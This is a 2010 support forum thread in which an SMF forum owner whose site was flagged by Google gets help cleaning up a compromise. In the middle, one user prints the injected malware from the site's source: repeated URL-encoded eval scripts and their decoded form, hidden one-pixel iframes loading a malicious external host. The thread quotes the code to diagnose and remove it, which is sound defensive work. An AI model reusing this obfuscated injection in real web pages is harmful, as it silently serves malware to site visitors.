Hi my forum is blocked?

rakicko · November 17, 2010, 03:57:20 AM

Hi,yesturday my forum was blocked on google..i found a error in index file and i remove it,and send a request on google for a review..but still it is a error

Code Select

http://www.champions-side.com

take a look..and please help me

( Edit: LexArma removed the active link. )

willemjan · November 17, 2010, 04:06:26 AM

Yeah because my Anti-Virus software goes wild on that site! You should clean that out dude!

Joker™ · November 17, 2010, 04:12:53 AM

There is some script running at your site (take a look at source code of your site)

try kb scan
http://www.simplemachines.org/community/index.php?topic=313201.msg2078209#msg2078209

willemjan · November 17, 2010, 04:13:34 AM

I actually got an ****** load of trojans in my comp because of that site....

rakicko · November 17, 2010, 04:42:08 AM

people i had a some code on idex..and i remove that..and now site is good..so not fuk..troyans around..i scan with Joker advice and every file is good

willemjan · November 17, 2010, 04:48:55 AM

Well, my AV doesn't lie... It went crazy on your site. Somehow there must be something in there...

I have to appologise for my previous reaction here. Didn't mean to sound harsh...

rakicko · November 17, 2010, 04:51:51 AM

i think that you av just reported it as a virus just like a you can see on home or other page..but i think if google remove that screen everything will be fine..someone have advice?

willemjan · November 17, 2010, 04:53:40 AM

Yeah ofcourse. First of all what kind of script(s) did you add?

rakicko · November 17, 2010, 04:55:55 AM

nothing..i just weak up and see that screen i take a look on my idex file and on the end i found unusual code..m,y host told me to remove that..i removied..and i report to googole to review

willemjan · November 17, 2010, 05:32:14 AM

It sounds like someone has been able to modify your files. Are there other people with FTP access?

Joker™ · November 17, 2010, 06:04:01 AM

Quote from: rakicko on November 17, 2010, 04:55:55 AM
nothing..i just weak up and see that screen i take a look on my idex file and on the end i found unusual code..m,y host told me to remove that..i removied..and i report to googole to review

I would call such malicious script in your filies as hacking of website. Google may have banned you because of such script in your file only.

willemjan · November 17, 2010, 06:16:09 AM

Quote from: Joker™ on November 17, 2010, 06:04:01 AM
Quote from: rakicko on November 17, 2010, 04:55:55 AM
nothing..i just weak up and see that screen i take a look on my idex file and on the end i found unusual code..m,y host told me to remove that..i removied..and i report to googole to review
I would call such malicious script in your filies as hacking of website. Google may have banned you because of such script in your file only.

My tought two, but was wanting to exclude all other options

rakicko · November 17, 2010, 07:26:02 AM

i think google banned me for that..but i remove that script,and nobody have a acces to my ftb

willemjan · November 17, 2010, 08:41:01 AM

I advise you to change all of your passwords (FTP, Database, Username, any other) of your website. Then make shure there are no strange files on your site.

Do you have a lot of custom coding on that site?

ThatGuyWhoKnowsThings · November 17, 2010, 08:57:18 AM

I don't think you have fixed it. I'm getting alerts.

willemjan · November 17, 2010, 08:58:50 AM

Quote from: mentaljason on November 17, 2010, 08:57:18 AM
I don't think you have fixed it. I'm getting alerts.

Make shure you do an deep virus scan... I've found 4 trojans on my computer after going to that site.

ThatGuyWhoKnowsThings · November 17, 2010, 09:01:10 AM

Quote from: willemjan on November 17, 2010, 08:58:50 AM
Quote from: mentaljason on November 17, 2010, 08:57:18 AM
I don't think you have fixed it. I'm getting alerts.

Make shure you do an deep virus scan... I've found 4 trojans on my computer after going to that site.

It is the college computer system, they use a proxy called "bloxx" and other servers preventing things like that from getting on the system, no need to worry

Thanks for the heads up though!

ThatGuyWhoKnowsThings · November 17, 2010, 09:06:26 AM

Just looking at the source and this seems very suspisious.

Code Select

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%34%32%30%38%37%33%34%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

It seems rather "encoded" don't you think?

After Decode;

Code Select

script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?4208734" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn -->

willemjan · November 17, 2010, 09:13:20 AM

Those Iframes are targeting setpoo.com. Norton about setpoo.com:

http://safeweb.norton.com/report/show?name=sedpoo.com

ThatGuyWhoKnowsThings · November 17, 2010, 09:20:49 AM

It does seem your website has been hacked then, You should, find you index file and look for abnormalities. The code i posted above (Encoded one) will lie in one of your scripts or will be included from somewhere. If you can't find it, i suggest a fresh SMF install ( Scan yourself too ) There is viruses. Then block sedpoo.com to prevent the iframes giving you a virus when you on.

willemjan · November 17, 2010, 09:27:52 AM

I agree. But íf you have an backup of your website (from before you got blocked on google), then you can restore that instead of an fresh install.

But make shure you change your passwords!

rakicko · November 17, 2010, 09:35:02 AM

i found that code yesturday on index page..and remove it..and how to scan download full website and scan with antivirus??

willemjan · November 17, 2010, 09:38:33 AM

Scanning the website for virusses won't help. The virusses are probably being loaded trough those iframes. Don't know iff its even possible to scan an live website. Here is a step-by-step plan what you should do:

1. Change all of your passwords.
2. Scan your computer for virusses and block setpoo.com.
3. Find any strange coding on your site and delete it.
4. If you can't find strange coding, then use an backup or a fresh install

Joker™ · November 17, 2010, 09:40:40 AM

My suggestion, if you can, take a large upgrade and re-install whole website

.

ThatGuyWhoKnowsThings · November 17, 2010, 11:56:14 AM

Well i am rather inexperienced with this but here is what i would deduct and the actions i would take:

The script is on the source code 2 times, at the start and at the end. Outside of the Start tags for the main script. that means in your index, see what the first "markup styled" action is, because it is at the top and bottom. so look for "un-needed" of External "includes" i.e a line saying, include "iamahacksite.hazes/iframehack";, or if they have just inserted the code into the the file as is, So look for the <script> that i posted earlier (the encoded one) just do Searches in the main files (It would be one of the first files as it is at the very top of the source code.)

Check file

index.php
For code:
include & <script>
And remove anything unusual or suspicious. (Download Clean SMF and look for what includes are usual)

Also, if you have any adds remember, they will not be in the default code.

Hope this helps.

Also, Check any mods you have for "security" problems, Check your own additions, and change our FTP password.

rakicko · November 17, 2010, 03:13:06 PM

i found in a lot of index files ..that code and remove it..i update from rc03 to a rc 04...hope it work now..i will contact google ..

rakicko · November 17, 2010, 03:22:26 PM

how can i scan now?

willemjan · November 18, 2010, 02:18:28 AM

Upgrading probably did a lot. I'm at work now, so I am not going to your site to check it... I'll do that when I'm home.

Have you changed your FTP password? Have you changed your DB password? Have you changed the password of the admin account?

rakicko · November 18, 2010, 08:20:46 AM

can you acces on forum now?i change ftp password and admin password..

willemjan · November 18, 2010, 08:24:33 AM

No, I'm still at my work. Rather do that on my personal comp. I'll try it tonight, ok?

rakicko · November 18, 2010, 10:18:15 AM

OK,I asked a few people and they can acces..i can acces too..try it tonight and let me know..

willemjan · November 18, 2010, 01:37:54 PM

Everything seems to be ok now. Good job

Have you scanned your computer?

rakicko · November 19, 2010, 04:31:15 AM

yes,i have a lot of virus on my computer..i will reinstal my windows today..to clean it all

willemjan · November 19, 2010, 04:45:13 AM

I guess thats solved then. If it is, mark it so.

News:

Hi my forum is blocked?